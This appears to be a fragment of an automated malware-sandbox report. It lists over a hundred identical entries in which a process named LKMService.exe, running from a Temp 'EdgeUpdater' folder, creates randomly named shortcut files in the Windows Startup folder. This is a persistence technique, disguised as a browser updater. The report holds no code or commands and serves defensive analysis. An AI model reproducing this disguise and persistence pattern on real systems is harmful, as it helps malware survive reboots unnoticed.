Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8f5dba4e2ba148289a1e14e0880ef4ee.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5c8f7c55cab44e29beabdda5cac31471.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_08d9ba422859475badad9504b252ee54.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9fe5129f69ea44278a87e6eab0dcc606.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c2b3da74a949418ca5559bb3894e5188.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a6923064572e4ccd84c26c55d63b860b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_063fb7da2c854bc59f435edaf2f70920.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1f0fcf26999f4580aad4326e8ae3d1a3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_93c2f93b4fd849d1b88565fe329f6d4e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d252c816d70841ae9014a0d40774b7d7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5bd05526e84c4b6e83d0689c52cd4ce6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1adf85cecce34c2c92ee385b72109918.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ca207dce1a3f4004baca445c37577ca5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c623dc6f7d7a4231a216e71a3a78e337.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c44038cc60054eaa8813562842dfd4ff.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ad5a2e4eb7754943b8e09f14b44ac581.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4749e2cc368144059b4cd1888c3b6beb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d71ea1dadf624f23ad17edc01e5e70e1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2136223416954fe187033caebcb1cfc8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cdf34a06f5f04e59afe810670c41aed8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5474480259634b5ba4b73fba1c31bddd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_10503dd545d3491b9cd25f874aebd985.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9864950db3fe494f92842576723b362b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9a46db2c0ae046dd8137897d8c56c57c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d7ab806f26774a04a2bb24c801e76e65.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9f44457b6b99471191baae8958f10f64.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3ded82778eac44198fe2af38e5d90fb1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e26d23f28e24e709de32f04528c4c37.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_97a5565f0540432a96c2db4661ef56dd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b20fe93fb8224c49992e3fa4f8b36e84.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d980c39a29e142bfa8ef274b4ed1aa12.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8dce8b53ec3e4cceb5ee02c4a86f9300.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3de829bb2acd486d87d00b0945bcbb90.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ecf4004d53484d75b8484e456ef0640f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1c02f26ac530417fb2fadd7af3fc4d65.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b0ff61a4a4e74ce692b605ad60c163cf.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a3d8e8caf5b74e1cb5d1e08eff83d042.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8004b617283945009c6783f0e2c79203.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6e040945423b4a1c9b6282493afc9683.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_59877324bd47442fb11e2a1cb98d1af6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_701678ee22db428180998008f1e1e8e8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_536febaff0c14399b2a5f0a71f27abb5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f9e2a266755b42c3bc3ef1e60c8ae0cc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c9c8ed401c9046588472b13742616046.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f2ea0783c74a408480a33bbceb196efd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a4af370eb77c4c9cbd5018d7ca0099cf.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e01417b271484156ac672a5446479ed1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1289f75c78f24a42a886ea2c379aeea8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6454922a2cdb481e83cd4fbe99c8f5d7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d218fff8069467f8a8cadb5926b48dc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_696f7e4952744021abb683916e7ff8b5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3ffc37bd34a64becbd10f5e9622a1e9e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a1932f351bcd418d8983e988434d983d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7ca43e5a2a824b8bbf5157b7d6e81dbe.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a370c7763f846c5add18054d5cf7e81.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0b66fbb85bd44e25aaa067ae7db445e2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fbd1b2c6a63046a59602cb7979d3e186.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_be70b80cff144530b83ef3b2b31e8af9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_701027883f04417891ac2b92a22938b7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e1cf4741900a453e881fcfa2ba7e919f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_203bbb5236bb490094bbaf1e760cfdd2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cdc289a05b8047ca875de3b26eb8baec.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bcb2a27902c04ac886a695d343fb75f9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_be180b968a954749aa123e80ce0de979.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fa024b867e304816a9e8a4e2c6df14aa.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_655190edc3c642f992f4e36b07e7a292.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_477fa627b0ea4f0980e7b4ad8bdab6e9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f24db5023d10422280119838e11e63f8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e643457c2df5450f9b4c79cf2f470b6b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_971bff6fbb0046c49deb530de7c9c592.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7287cf39706242cf94afb96ca26091c4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a0c780a7f3fe46e9ac10bd7ccc193c49.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2f0cda443c7440529e987d9863892995.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c5d9a9c2feef4d35972cea293717df8c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_01141e4cd9f44cd19b9b2e85a72b24a8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5bac9058eacd431fb79e14cfa9a71a14.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2f919cd4d98146f99eae5621b4403711.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d6971002c8994f00ab4026ceb40348d3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f23e31b3b9d74a3994a88ae49b183408.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f818ffdb9a594c0ba1e86f22b72d98d8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c929bc1f5a3548e49da71bf0ae8d15d7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3ee8bf8c8df7484585a80cd7dfc4eeb8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_157796f76a23457d964d50669a8cd9dd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e59ef7c70c724c14a1dba46b3971da4e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8b5d5e75ba40469084ac67dbe934085e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5a4b75ff86c74ba3b15f516ab9ded1e1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b2fe78690c1440f1a444a25803f112ae.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_993e60dd609e4200a951738c8bcc68b7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2619a6e772bb41aab142ae37f81f6af0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3ae76013a2774871b212e11a49df80ed.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1ec913073b68454a945d0abe46c2d72a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b1efac17e1714f33a1e770952981198c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_54f5f2685b40492081ed87241041e79e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f595cc73096e44d393426cf73bdabc1d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_adcfdfc361fc4f22adfec6f065131ed4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8e6ff7a7c24f4178899922fe4af5d8eb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4602aa8de8bd45099ce1428fcf5e0db8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a554d65c2bf47c6a24a55a9fa0f1405.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_94667d0d2b3548f6b02e1cc42175760b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1bd1229c28a247ccbae28d1658cbf451.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_10e96af271bb488f93f8b7d3ad6b73f0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_07925d2612834470b55263c493edd42e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_32d2eb40575b41c698e47bcb9282fbf3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e242dbf4aaf9417b9223a9ceac18a511.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_53bca4c59bae4fb69d93994cf78f3af7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b0f24fc7ea5e4003af27784610fd49cf.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bd59d1e6d8b24139a2310d520d63b88d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f4f9af98220345acb58f6f5d3c53e006.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_99b98d44346149bba7ce391a515210bb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bcabf17a8b0b4c3cb548ece7f53d865a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d04a7cdf4a7c4ca798f726d23ee710a3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1e3c043401fd4c09b89ba7ba53b43cd1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ad857f472e2f43d0b964265a4f23d90c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8481abd0a5de4d2286d58b33004e49c6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a8e85d0f7be64949b55a8aa7fd05d68e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5b83fde377d24cee8c4b1a26c642e65d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4bde893ad89041ad8fa3f07de38743ed.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6e9ab98f879846369d6c9a2b1b018d2a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d0c83d4309c14b5aa8fca2e7afa8e9cc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_28d544f7e89c48718c50b1fe84f03bef.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d7c3afb4c9074aafa1f945b27a3e2d59.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_911b21619c8449b8a3c6d9e0c905bfc7.lnk	Jump to behavior
